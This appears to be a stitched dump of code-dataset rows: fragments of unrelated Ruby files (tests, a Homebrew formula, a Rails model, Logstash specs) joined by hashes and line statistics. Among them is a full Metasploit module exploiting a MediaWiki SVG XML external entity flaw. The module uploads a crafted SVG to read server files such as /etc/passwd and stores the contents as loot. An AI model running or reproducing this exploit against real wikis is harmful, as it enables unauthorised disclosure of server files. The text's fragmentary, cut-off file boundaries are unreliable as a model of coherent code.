<xsd:getLatestInterestAndExchangeRates>
<languageid>en</languageid>
#{series}
</xsd:getLatestInterestAndExchangeRates>
</soap:Body>
</soap:Envelope>
XML
end
end
end
| 25.919355 | 114 | 0.611077 |
28cee3a1254cc4da3bcb1b44b5231a3fdb7fd678 | 3,073 | # frozen_string_literal: true
require 'test_helper'
class MyForm
include NewApplicationForm
def initialize(provider:, service_plans_management_visible:)
@provider = provider
@user = FactoryBot.create(:simple_user, account: @provider)
@service_plans_management_visible = service_plans_management_visible
end
attr_reader :provider, :user
def service_plans_management_visible?
@service_plans_management_visible
end
end
module Concerns
class NewApplicationFormTest < ActiveSupport::TestCase
include ActiveJob::TestHelper
def setup(**opts)
@provider = FactoryBot.create(:simple_provider)
@form = MyForm.new(provider: @provider, **opts)
end
attr_reader :provider, :form
delegate :new_application_form_base_data,
:buyers,
:products,
:application_defined_fields_data, to: :form
class WithServicePlansManagementVisible < NewApplicationFormTest
def setup
super(service_plans_management_visible: true)
end
end
class WithoutServicePlansManagementVisible < NewApplicationFormTest
def setup
super(service_plans_management_visible: false)
end
end
test "new_application_form_base_data" do
form_data = new_application_form_base_data(provider)
expected_keys = %i[create-application-plan-path create-service-plan-path service-subscriptions-path service-plans-allowed defined-fields]
unexpected_keys = %i[most-recently-updated-products products-count buyer errors product most-recently-created-buyers buyers-count]
assert_same_elements expected_keys, form_data.keys
unexpected_keys.each { |key| assert_does_not_contain form_data.keys, key }
end
test "new_application_form_base_data with application" do
application = FactoryBot.create(:cinstance)
form_data = new_application_form_base_data(provider, application)
expected_keys = %i[create-application-plan-path create-service-plan-path service-subscriptions-path service-plans-allowed defined-fields errors]
unexpected_keys = %i[most-recently-updated-products products-count buyer product most-recently-created-buyers buyers-count]
assert_same_elements expected_keys, form_data.keys
unexpected_keys.each { |key| assert_does_not_contain form_data.keys, key }
end
test "buyers are limited to 20" do
FactoryBot.create_list(:simple_buyer, 21, provider_account: provider)
assert_equal 20, buyers.size
end
test "products are limited to 20" do
FactoryBot.create_list(:simple_service, 21, account: provider)
assert_equal 20, products.size
end
test "application_defined_fields_data" do
field = FactoryBot.create(:fields_definition, account: provider, target: 'Cinstance')
data = application_defined_fields_data(provider)
assert_equal 1, data.size
assert_equal "cinstance[#{field.name}]", data.first[:name]
end
def self.runnable_methods
Concerns::NewApplicationFormTest == self ? [] : super
end
end
end
| 32.691489 | 150 | 0.743573 |
e28c3fe135ce456116db21166e537749a3c4eafb | 1,332 | class Emqx < Formula
homepage "https://emqx.io"
url "https://repos.emqx.io/emqx-ce/homebrew/emqx-homebrew-4.3.5.zip"
sha256 "019e1a2a704caa6a878c46d4e3a1a5241f1cbd34d236f78de8db5a9f0460e480"
version "4.3.5"
depends_on "openssl"
def install
prefix.install Dir["*"]
bin.install Dir[libexec/"/bin/emqx"]
rm %W[#{bin}/emqx.cmd #{bin}/emqx_ctl.cmd]
end
plist_options :manual => "emqx"
def plist; <<-EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>Program</key>
<string>#{opt_bin}/emqx</string>
<key>RunAtLoad</key>
<true/>
<key>EnvironmentVariables</key>
<dict>
<!-- need erl in the path -->
<key>PATH</key>
<string>#{HOMEBREW_PREFIX}/sbin:/usr/bin:/bin:#{HOMEBREW_PREFIX}/bin</string>
<key>CONF_ENV_FILE</key>
<string>#{etc}/emqx.conf<string>
</dict>
</dict>
</plist>
EOS
end
def post_install
system "mkdir", "-p", "#{prefix}/data/configs"
end
test do
system emqx, "start"
system emqx_ctl, "status"
system emqx, "stop"
end
end
| 25.615385 | 87 | 0.594595 |
0108cd77e878994b8d1d174a3d172822b81af6f0 | 332 | class Appcleaner < Cask
version '2.2.3'
sha256 '90b3d8e3c32388035e5154594222d66d48d5cad263a5387f77f9ea77315af84d'
url "http://www.freemacsoft.net/downloads/AppCleaner_#{version}.zip"
appcast 'http://www.freemacsoft.net/appcleaner/Updates.xml'
homepage 'http://www.freemacsoft.net/appcleaner/'
app 'AppCleaner.app'
end
| 30.181818 | 75 | 0.78012 |
2139f912c417d0e054984397f5947f87db8bcc88 | 962 | require 'rom/support/class_builder'
describe ROM::ClassBuilder do
subject(:builder) { ROM::ClassBuilder.new(options) }
let(:klass) { builder.call }
describe '#call' do
let(:options) do
{ name: 'Test', parent: parent }
end
let(:parent) { Class.new }
it 'returns a class constant' do
expect(klass).to be_instance_of(Class)
end
it 'sets class name based on provided :name option' do
expect(klass.name).to eql(options[:name])
end
it 'uses a parent class provided by :parent option' do
expect(klass).to be < parent
end
it 'defines to_s and inspect' do
expect(klass.to_s).to eql(options[:name])
expect(klass.inspect).to eql(options[:name])
end
it 'yields created class' do
klass = builder.call { |yielded_class|
yielded_class.class_eval do
def self.testing; end
end
}
expect(klass).to respond_to(:testing)
end
end
end
| 22.372093 | 58 | 0.633056 |
e284f05875976452c7ecf3f25bafee5018ea32cf | 6,008 | # A container item is something that has been "localized to" a container.
# We can't say that it is "in" the container, because not all containers (e.g. a pin with three specimens) contain the object.
# By "localized to" we mean that if you can find the container, then its contents should also be locatable.
#
# This concept is a graph edge defining the relationship to the container.
#
# @!attribute parent_id
# @return [Integer]
# id of the ContainerItem whose contained_object is a Container, i.e. the container of this ContainerItem
#
# @!attribute contained_object_id
# @return [Integer]
# the id of the object that is contained (Rails polymorphic)
#
# @!attribute contained_object_type
# @return [String]
# the type of the object that is contained (Rails polymorphic)
#
# @!attribute localization
# @return [String]
# some additional modifier arbitrarily defining the position of this item, aka disposition, always relative to enclosing container
#
# @!attribute project_id
# @return [Integers
# the project ID
#
## @!attribute disposition_x
# @return [Integer]
# a x coordinate for this item in its container
#
## @!attribute disposition_y
# @return [Integer]
# a y coordinate for this item in its container
#
## @!attribute disposition_z
# @return [Integer]
# a z coordinate for this item in its container
#
class ContainerItem < ApplicationRecord
# @return class
# this method calls Module#module_parent
# TODO: This method can be placed elsewhere inside this class (or even removed if not used)
# when https://github.com/ClosureTree/closure_tree/issues/346 is fixed.
def self.parent
self.module_parent
end
has_closure_tree
include Housekeeping
include Shared::IsData
attr_accessor :global_entity
attr_accessor :container_id
belongs_to :contained_object, polymorphic: true
# !! this will prevent accepts_nested assignments if we add this
validates_presence_of :contained_object_id
validate :parent_contained_object_is_container
validate :contained_object_is_container_when_parent_id_is_blank
validate :contained_object_is_unique
validate :object_fits_in_container
validate :position_is_not_replicated
validate :parent_is_provided_if_object_is_not_container
scope :containers, -> { where(contained_object_type: 'Container') }
scope :not_containers, -> { where.not(contained_object_type: 'Container') }
scope :containing_collection_objects, -> {where(contained_object_type: 'CollectionObject')}
# before_save :set_container, unless: Proc.new {|n| n.container_id.nil? || errors.any? }
# @params object [Container]
def container=(object)
if object.metamorphosize.kind_of?(Container)
if self.parent
self.parent.contained_object = object
else
# This self required?!
self.parent = ContainerItem.new(contained_object: object)
end
self.parent.save! if !self.parent.new_record?
save! unless new_record?
end
end
# @param value [a Container#id]
def container_id=(value)
@container_id = value
set_container
end
# @return [Container, nil]
# the immediate container for this ContainerItem
def container
parent.try(:contained_object)
end
# TODO: this is silly, type should be the same
# @return [GlobalID]
# ! not a string
def global_entity
contained_object.to_global_id if contained_object.present?
end
# @params entity [String, a global id]
def global_entity=(entity)
self.contained_object = GlobalID::Locator.locate(entity)
end
protected
def set_container
c = Container.find(container_id)
# Already in some container
if parent && parent.persisted?
self.parent.update_columns(contained_object_type: 'Container', contained_object_id: c.id)
# Not in container
else
# In same container as something else
if d = c.container_item
self.parent = d
# In a new container
else
self.parent = ContainerItem.create!(contained_object: c)
end
end
# self.parent.save! if !self.parent.new_record?
# save! unless new_record?
end
def object_fits_in_container
if parent
%w{x y z}.each do |coord|
c = send("disposition_#{coord}")
errors.add("disposition_#{coord}".to_sym, 'is larger than the container size') if c && parent.contained_object.send("size_#{coord}") < c
end
end
end
def position_is_not_replicated
if parent && (disposition_x || disposition_y || disposition_z)
if ContainerItem.where.not(id: id).
where(parent: parent,
disposition_x: disposition_x,
disposition_y: disposition_y,
disposition_z: disposition_z ).count > 0
errors.add(:base, 'position is already taken in this container')
end
end
end
# If the contained_object is a CollectionObject, it must have a parent container reference
def contained_object_is_container_when_parent_id_is_blank
if parent_id.blank? && container_id.blank? && container.blank?
errors.add(:parent_id, 'can only be blank if object is a container') if contained_object_type != 'Container'
end
end
# parent_id links an object to a container through container_item
def parent_contained_object_is_container
unless parent_id.blank? && parent.nil?
errors.add(:parent_id, "can only be set if parent's contained object is a container") if parent.contained_object_type != 'Container'
end
end
def parent_is_provided_if_object_is_not_container
if !(contained_object_type =~ /Container/) && !parent
errors.add(:parent, "must be set if contained object is not a container")
end
end
def contained_object_is_unique
if ContainerItem.where.not(id: id).where(project_id: project_id, contained_object_id: contained_object_id, contained_object_type: contained_object_type).count > 0
errors.add(:contained_object, 'is already in a container_item')
end
end
end
| 32.475676 | 166 | 0.721039 |
f715266cb6b476f9705aca0088c71ff28a8bd6d4 | 681 | require 'spec_helper_acceptance'
describe 'pe_databases class' do
context 'activates module default parameters' do
it 'applies the class with default parameters' do
pp = <<-MANIFEST
include pe_databases
MANIFEST
# Run it twice and test for idempotency
idempotent_apply(pp)
end
end
describe 'check pe_databases script directory' do
it 'scripts folder exists' do
expect(file('/opt/puppetlabs/pe_databases/scripts')).to be_directory
end
end
describe 'check systemd fact' do
it 'is true on all supported OS' do
expect(host_inventory['facter']['pe_databases']['have_systemd']).to eq true
end
end
end
| 25.222222 | 81 | 0.697504 |
38f4ade29eed179275e6bc9c1d9bc09df5fbb4cd | 1,086 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2018_09_24_001419) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
create_table "time_samples", force: :cascade do |t|
t.string "location"
t.integer "value"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
end
| 41.769231 | 86 | 0.771639 |
1c6ee2eacdd6cca1e7566c5014cd504be95fc60c | 5,967 | # encoding: utf-8
require "test_utils"
require "logstash/filters/mutate"
describe LogStash::Filters::Mutate do
extend LogStash::RSpec
describe "basics" do
config <<-CONFIG
filter {
mutate {
lowercase => "lowerme"
uppercase => "upperme"
convert => [ "intme", "integer", "floatme", "float" ]
rename => [ "rename1", "rename2" ]
replace => [ "replaceme", "hello world" ]
replace => [ "newfield", "newnew" ]
update => [ "nosuchfield", "weee" ]
update => [ "updateme", "updated" ]
remove => [ "removeme" ]
}
}
CONFIG
event = {
"lowerme" => [ "ExAmPlE" ],
"upperme" => [ "ExAmPlE" ],
"intme" => [ "1234", "7890.4", "7.9" ],
"floatme" => [ "1234.455" ],
"rename1" => [ "hello world" ],
"updateme" => [ "who cares" ],
"replaceme" => [ "who cares" ],
"removeme" => [ "something" ]
}
sample event do
insist { subject["lowerme"] } == ['example']
insist { subject["upperme"] } == ['EXAMPLE']
insist { subject["intme"] } == [1234, 7890, 7]
insist { subject["floatme"] } == [1234.455]
reject { subject }.include?("rename1")
insist { subject["rename2"] } == [ "hello world" ]
reject { subject }.include?("removeme")
insist { subject }.include?("newfield")
insist { subject["newfield"] } == "newnew"
reject { subject }.include?("nosuchfield")
insist { subject["updateme"] } == "updated"
end
end
describe "remove multiple fields" do
config '
filter {
mutate {
remove => [ "remove-me", "remove-me2", "diedie", "[one][two]" ]
}
}'
sample(
"remove-me" => "Goodbye!",
"remove-me2" => 1234,
"diedie" => [1, 2, 3, 4],
"survivor" => "Hello.",
"one" => { "two" => "wee" }
) do
insist { subject["survivor"] } == "Hello."
reject { subject }.include?("remove-me")
reject { subject }.include?("remove-me2")
reject { subject }.include?("diedie")
reject { subject["one"] }.include?("two")
end
end
describe "convert one field to string" do
config '
filter {
mutate {
convert => [ "unicorns", "string" ]
}
}'
sample("unicorns" => 1234) do
insist { subject["unicorns"] } == "1234"
end
end
describe "gsub on a String" do
config '
filter {
mutate {
gsub => [ "unicorns", "but extinct", "and common" ]
}
}'
sample("unicorns" => "Magnificient, but extinct, animals") do
insist { subject["unicorns"] } == "Magnificient, and common, animals"
end
end
describe "gsub on an Array of Strings" do
config '
filter {
mutate {
gsub => [ "unicorns", "extinct", "common" ]
}
}'
sample("unicorns" => [
"Magnificient extinct animals", "Other extinct ideas" ]
) do
insist { subject["unicorns"] } == [
"Magnificient common animals",
"Other common ideas"
]
end
end
describe "gsub on multiple fields" do
config '
filter {
mutate {
gsub => [ "colors", "red", "blue",
"shapes", "square", "circle" ]
}
}'
sample("colors" => "One red car", "shapes" => "Four red squares") do
insist { subject["colors"] } == "One blue car"
insist { subject["shapes"] } == "Four red circles"
end
end
describe "regression - mutate should lowercase a field created by grok" do
config <<-CONFIG
filter {
grok {
match => { "message" => "%{WORD:foo}" }
}
mutate {
lowercase => "foo"
}
}
CONFIG
sample "HELLO WORLD" do
insist { subject["foo"] } == "hello"
end
end
describe "LOGSTASH-757: rename should do nothing with a missing field" do
config <<-CONFIG
filter {
mutate {
rename => [ "nosuchfield", "hello" ]
}
}
CONFIG
sample "whatever" do
reject { subject }.include?("nosuchfield")
reject { subject }.include?("hello")
end
end
describe "convert should work on nested fields" do
config <<-CONFIG
filter {
mutate {
convert => [ "[foo][bar]", "integer" ]
}
}
CONFIG
sample({ "foo" => { "bar" => "1000" } }) do
insist { subject["[foo][bar]"] } == 1000
insist { subject["[foo][bar]"] }.is_a?(Fixnum)
end
end
#LOGSTASH-1529
describe "gsub on a String with dynamic fields (%{}) in pattern" do
config '
filter {
mutate {
gsub => [ "unicorns", "of type %{unicorn_type}", "green" ]
}
}'
sample("unicorns" => "Unicorns of type blue are common", "unicorn_type" => "blue") do
insist { subject["unicorns"] } == "Unicorns green are common"
end
end
#LOGSTASH-1529
describe "gsub on a String with dynamic fields (%{}) in pattern and replace" do
config '
filter {
mutate {
gsub => [ "unicorns2", "of type %{unicorn_color}", "%{unicorn_color} and green" ]
}
}'
sample("unicorns2" => "Unicorns of type blue are common", "unicorn_color" => "blue") do
insist { subject["unicorns2"] } == "Unicorns blue and green are common"
end
end
#LOGSTASH-1529
describe "gsub on a String array with dynamic fields in pattern" do
config '
filter {
mutate {
gsub => [ "unicorns_array", "of type %{color}", "blue and green" ]
}
}'
sample("unicorns_array" => [
"Unicorns of type blue are found in Alaska", "Unicorns of type blue are extinct" ],
"color" => "blue"
) do
insist { subject["unicorns_array"] } == [
"Unicorns blue and green are found in Alaska",
"Unicorns blue and green are extinct"
]
end
end
end
| 25.831169 | 91 | 0.52053 |
87043bb91f5a0121b11b61ce928df00b6a422859 | 1,370 | # frozen_string_literal: true
require 'optparse'
require 'cadenza/cli/options'
require 'multi_json'
module Cadenza
# The code for the command line interface is defined here
module Cli
module_function
def run!(path, options = {})
# set up the load paths
if options[:root]
load_paths.push(options[:root])
elsif options.fetch(:load_paths, []).any?
load_paths.concat(options[:load_paths])
else
load_paths.push(Dir.pwd)
end
# add load paths to the context
load_paths.each do |load_path|
context.add_load_path load_path
end
# based on the action, perform whatever the user has asked
send(options[:action], path, options)
end
def tokenize(path, _options)
lexer = Cadenza::Lexer.new
lexer.source = context.load_source!(path)
$stdout.puts lexer.remaining_tokens.map(&:inspect).join("\n")
end
def parse(path, _options)
$stdout.puts context.load_template!(path).to_tree
end
def render(path, options)
Cadenza.render_template path, options[:context], context: context
end
private
def load_paths
@load_paths ||= []
end
def context
@context ||= begin
context = Cadenza::BaseContext.new
context.whiny_template_loading = true
context
end
end
end
end
| 22.833333 | 71 | 0.645985 |
5d08288810665ff74cd226211caa004f722146a7 | 9,900 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'MediaWiki SVG XML Entity Expansion Remote File Access',
'Description' => %q{
This module attempts to read a remote file from the server using a vulnerability
in the way MediaWiki handles SVG files. The vulnerability occurs while trying to
expand external entities with the SYSTEM identifier. In order to work MediaWiki must
be configured to accept upload of SVG files. If anonymous uploads are allowed the
username and password aren't required, otherwise they are. This module has been
tested successfully on MediaWiki 1.19.4, 1.20.3 on Ubuntu 10.04 and Ubuntu 12.10.
Older versions were also tested but do not seem to be vulnerable to this vulnerability.
The following MediaWiki requirements must be met: File upload must be enabled,
$wgFileExtensions[] must include 'svg', $wgSVGConverter must be set to something
other than 'false'.
},
'References' =>
[
[ 'OSVDB', '92490' ],
[ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=46859' ],
[ 'URL', 'http://www.gossamer-threads.com/lists/wiki/mediawiki-announce/350229']
],
'Author' =>
[
'Daniel Franke', # Vulnerability discovery and PoC
'juan vazquez', # Metasploit module
'Christian Mehlmauer' # Metasploit module
],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'Path to MediaWiki', '/mediawiki']),
OptString.new('RFILE', [true, 'Remote File', '/etc/passwd']),
OptString.new('USERNAME', [ false, "The user to authenticate as"]),
OptString.new('PASSWORD', [ false, "The password to authenticate with" ])
], self.class)
register_autofilter_ports([ 80 ])
deregister_options('RHOST')
end
def rport
datastore['RPORT']
end
def peer(rhost)
"#{rhost}:#{rport}"
end
def get_first_session
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "index.php"),
'method' => 'GET',
'vars_get' => {
"title" => "Special:UserLogin",
"returnto" => "Main+Page"
}
})
if res and res.code == 200 and res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /([^\s]*session)=([a-z0-9]+)/
return $1,$2
else
return nil
end
end
def get_login_token
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "index.php"),
'method' => 'GET',
'vars_get' => {
"title" => "Special:UserLogin",
"returnto" => "Main+Page"
},
'cookie' => session_cookie
})
if res and res.code == 200 and res.body =~ /name="wpLoginToken" value="([a-f0-9]*)"/
return $1
else
return nil
end
end
def parse_auth_cookie(cookies)
cookies.split(";").each do |part|
case part
when /([^\s]*UserID)=(.*)/
@wiki_user_id_name = $1
@wiki_user_id = $2
when /([^\s]*UserName)=(.*)/
@wiki_user_name_name = $1
@wiki_user_name = $2
when /session=(.*)/
@wiki_session = $1
else
next
end
end
end
def session_cookie
if @user and @password
return "#{@wiki_session_name}=#{@wiki_session}; #{@wiki_user_id_name}=#{@wiki_user_id}; #{@wiki_user_name_name}=#{@wiki_user_name}"
else
return "#{@wiki_session_name}=#{@wiki_session}"
end
end
def authenticate
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "index.php"),
'method' => 'POST',
'vars_get' => {
"title" => "Special:UserLogin",
"action" => "submitlogin",
"type" => "login"
},
'vars_post' => {
"wpName" => datastore['USERNAME'],
"wpPassword" => datastore['PASSWORD'],
"wpLoginAttempt" => "Log+in",
"wpLoginToken" => @login_token,
"returnto" => "Main+Page"
},
'cookie' => session_cookie
})
if res and res.code == 302 and res.headers['Set-Cookie'] =~ /UserID=/
parse_auth_cookie(res.headers['Set-Cookie'])
return true
else
return false
end
end
def get_edit_token
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "index.php", "Special:Upload"),
'method' => 'GET',
'cookie' => session_cookie
})
if res and res.code == 200 and res.body =~/<title>Upload file/ and res.body =~ /<input id="wpEditToken" type="hidden" value="([0-9a-f]*)\+\\" name="wpEditToken" \/>/
return $1
else
return nil
end
end
def upload_file
entity = Rex::Text.rand_text_alpha_lower(3)
@file_name = Rex::Text.rand_text_alpha_lower(4)
svg_file = %Q|
<!DOCTYPE svg [<!ENTITY #{entity} SYSTEM "file://#{datastore['RFILE']}">]>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1">
<desc>&#{entity};</desc>
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:1;stroke:rgb(0,0,0)" />
</svg>
|
svg_file.gsub!(/\t\t/, "")
post_data = Rex::MIME::Message.new
post_data.add_part(svg_file, "image/svg+xml", nil, "form-data; name=\"wpUploadFile\"; filename=\"#{@file_name}.svg\"")
post_data.add_part("#{@file_name.capitalize}.svg", nil, nil, "form-data; name=\"wpDestFile\"")
post_data.add_part("", nil, nil, "form-data; name=\"wpUploadDescription\"")
post_data.add_part("", nil, nil, "form-data; name=\"wpLicense\"")
post_data.add_part("#{@edit_token}+\\", nil, nil, "form-data; name=\"wpEditToken\"")
post_data.add_part("Special:Upload", nil, nil, "form-data; name=\"title\"")
post_data.add_part("1", nil, nil, "form-data; name=\"wpDestFileWarningAck\"")
post_data.add_part("Upload file", nil, nil, "form-data; name=\"wpUpload\"")
# Work around an incompatible MIME implementation
data = post_data.to_s
data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "index.php", "Special:Upload"),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => session_cookie
})
if res and res.code == 302 and res.headers['Location']
return res.headers['Location']
else
# try to output the errormessage
if res and res.body
error = res.body.scan(/<div class="error">(.*?)<\/div>/m)[0]
if error and error.size == 1
vprint_error(error[0])
end
end
return nil
end
end
def read_data
res = send_request_cgi({
'uri' => @svg_uri,
'method' => 'GET',
'cookie' => session_cookie
})
if res and res.code == 200 and res.body =~ /File:#{@file_name.capitalize}.svg/ and res.body =~ /Metadata/ and res.body =~ /<th>Image title<\/th>\n<td>(.*)<\/td>\n<\/tr><\/table>/m
return $1
else
return nil
end
end
def accessfile(rhost)
vprint_status("#{peer(rhost)} MediaWiki - Getting unauthenticated session...")
@wiki_session_name, @wiki_session = get_first_session
if @wiki_session.nil?
print_error("#{peer(rhost)} MediaWiki - Failed to get unauthenticated session...")
return
end
vprint_status("#{peer(rhost)} Sessioncookie: #{@wiki_session_name}=#{@wiki_session}")
if @user and not @user.empty? and @password and not @password.empty?
vprint_status("#{peer(rhost)} MediaWiki - Getting login token...")
@login_token = get_login_token
if @login_token.nil?
print_error("#{peer(rhost)} MediaWiki - Failed to get login token")
return
end
vprint_status("#{peer(rhost)} Logintoken: #{@login_token}")
if not authenticate
print_error("#{peer(rhost)} MediaWiki - Failed to authenticate")
return
end
vprint_status("#{peer(rhost)} Userid cookie: #{@wiki_user_id_name}=#{@wiki_user_id}")
vprint_status("#{peer(rhost)} Username cookie: #{@wiki_user_name_name}=#{@wiki_user_name}")
vprint_status("#{peer(rhost)} Session cookie: #{@wiki_session_name}=#{@wiki_session}")
end
vprint_status("#{peer(rhost)} MediaWiki - Getting edit token...")
@edit_token = get_edit_token
if @edit_token.nil?
print_error("#{peer(rhost)} MediaWiki - Failed to get edit token")
return
end
vprint_status("#{peer(rhost)} Edittoken: #{@edit_token}")
vprint_status("#{peer(rhost)} MediaWiki - Uploading SVG file...")
@svg_uri = upload_file
if @svg_uri.nil?
print_error("#{peer(rhost)} MediaWiki - Failed to upload SVG file")
return
end
vprint_status("#{peer(rhost)} SVG URI: #{@svg_uri}")
vprint_status("#{peer(rhost)} MediaWiki - Retrieving remote file...")
loot = read_data
if loot.nil? or loot.empty?
print_error("#{peer(rhost)} MediaWiki - Failed to retrieve remote file")
return
end
f = ::File.basename(datastore['RFILE'])
path = store_loot('mediawiki.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
print_status("#{peer(rhost)} MediaWiki - #{datastore['RFILE']} saved in #{path}")
end
def run
@user = datastore['USERNAME']
@password = datastore['USERNAME']
super
end
def run_host(ip)
accessfile(ip)
end
end
| 33.221477 | 183 | 0.60697 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.